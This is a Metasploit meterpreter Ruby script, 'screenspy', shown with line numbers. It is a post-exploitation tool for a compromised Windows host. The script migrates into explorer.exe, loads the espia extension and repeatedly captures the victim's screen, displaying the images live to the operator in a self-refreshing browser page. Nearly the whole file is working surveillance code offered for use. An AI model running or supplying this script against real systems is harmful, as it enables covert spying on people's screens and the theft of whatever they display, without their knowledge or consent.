Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
3
# If you'd like to improve this script, please try to port it as a post
4
# module instead. Thank you.
5
##
6

7

8

9
# Author:Roni Bachar (@roni_bachar) [email protected]
10
#
11
# This script will open an interactive view of remote hosts
12
# You will need firefox installed on your machine
13

14

15
require 'fileutils'
16

17
opts = Rex::Parser::Arguments.new(
18
  "-h" => [ false, "Help menu." ],
19
  "-d" => [ true, "The Delay in seconds between each screenshot." ],
20
  "-t" => [ true, "The time to run in sec." ],
21
  "-s" => [ true, "The local system linux/windows" ]
22
)
23

24
freq = 3
25
count = 10
26
file = "screenshot.jpeg"
27
meter_type = client.platform
28
localsys = "linux"
29

30
opts.parse(args) { |opt, idx, val|
31
  case opt
32
  when '-d'
33
    freq = val.to_i
34
  when '-t'
35
    count = val.to_i
36
  when '-s'
37
    localsys = val.to_s
38

39
  when "-h"
40
    print_line
41
    print_line "Screenspy v1.0"
42
    print_line "--------------"
43
    print_line
44
    print_line
45
    print_line "Usage: bgrun screenspy -t 20 -d 1 => will take interactive Screenshot every sec for 20 sec long."
46
    print_line "Usage: bgrun screenspy -t 60 -d 5 => will take interactive Screenshot every 5 sec for 1 min long."
47
    print_line "Usage: bgrun screenspy -s windows -d 1 -t 60 => will take interactive Screenshot every 1 sec for 1 min long, windows local mode."
48
    print_line
49
    print_line "Author:Roni Bachar (@roni_bachar) [email protected]"
50
    print_line(opts.usage)
51
    raise Rex::Script::Completed
52
  end
53
}
54

55
# Wrong Meterpreter Version Message Function
56
#-------------------------------------------------------------------------------
57
def wrong_meter_version(meter = meter_type)
58
  print_error("#{meter} version of Meterpreter is not supported with this Script!")
59
  raise Rex::Script::Completed
60
end
61

62
# Check for Version of Meterpreter
63
wrong_meter_version(meter_type) if meter_type != 'windows'
64
session = client
65

66

67

68
host,port = session.session_host, session.session_port
69

70
print_status("New session on #{host}:#{port}...")
71

72
logs = ::File.join(Msf::Config.install_root, 'logs', 'screenshot', host)
73

74
outfile = ::File.join(Msf::Config.log_directory,file)
75

76
::FileUtils.mkdir_p(logs)
77

78

79
begin
80
  process2mig = "explorer.exe"
81

82
  # Actual migration
83
  mypid = session.sys.process.getpid
84
  session.sys.process.get_processes().each do |x|
85
    if (process2mig.index(x['name'].downcase) and x['pid'] != mypid)
86
      print_status("#{process2mig} Process found, migrating into #{x['pid']}")
87
      session.core.migrate(x['pid'].to_i)
88
      print_status("Migration Successful!!")
89
    end
90
  end
91
rescue
92
  print_status("Failed to migrate process!")
93
  #next
94
end
95

96

97
begin
98
  session.core.use("espia")
99

100

101
  begin
102

103
    data="<title>#{host}</title><img src='file:///#{Msf::Config.install_root}/logs/screenshot/#{host}/screenshot.jpeg' width='500' height='500'><meta http-equiv='refresh' content='1'>"
104
    path1 = File.join(logs,"video.html")
105
    File.open(path1, 'w') do |f2|
106
      f2.puts(data)
107
    end
108

109

110
    if (localsys == "windows")
111

112
      print_status("Running in local mode => windows")
113
      print_status("Opening Interactive view...")
114
      localcmd="start firefox -width 530 -height 660 \"file:///#{Msf::Config.install_root}/logs/screenshot/#{host}/video.html\""
115
    else
116
      print_status("Running in local mode => Linux")
117
      print_status("Opening Interactive view...")
118
      localcmd="bash firefox -width 530 -height 660 \"file:///#{Msf::Config.install_root}/logs/screenshot/#{host}/video.html\""
119
    end
120

121
    system (localcmd)
122
    (1..count).each do |i|
123
      sleep(freq) if(i != 1)
124
      path = File.join(logs,"screenshot.jpeg")
125
      data = session.espia.espia_image_get_dev_screen
126

127
      if(data)
128
        ::File.open(path, 'wb') do |fd|
129
          fd.write(data)
130
          fd.close()
131
        end
132
      end
133
    end
134

135
  rescue ::Exception => e
136
    print_status("Interactive Screenshot Failed: #{e.class} #{e} #{e.backtrace}")
137
  end
138

139
  print_status("The interactive Session ended...")
140
  data = <<-EOS
141
<title>#{host} - Interactive Session ended</title>
142
<img src='file:///#{Msf::Config.install_root}/logs/screenshot/#{host}/screenshot.jpeg' width='500' height='500'>
143
<script>alert('Interactive Session ended - Happy Hunting')</script>
144
EOS
145
  File.open(path1, 'w') do |f2|
146
    f2.puts(data)
147
  end
148

149
rescue ::Exception => e
150
  print_status("Exception: #{e.class} #{e} #{e.backtrace}")
151
end
152

153

154

155

156

157

158

159

160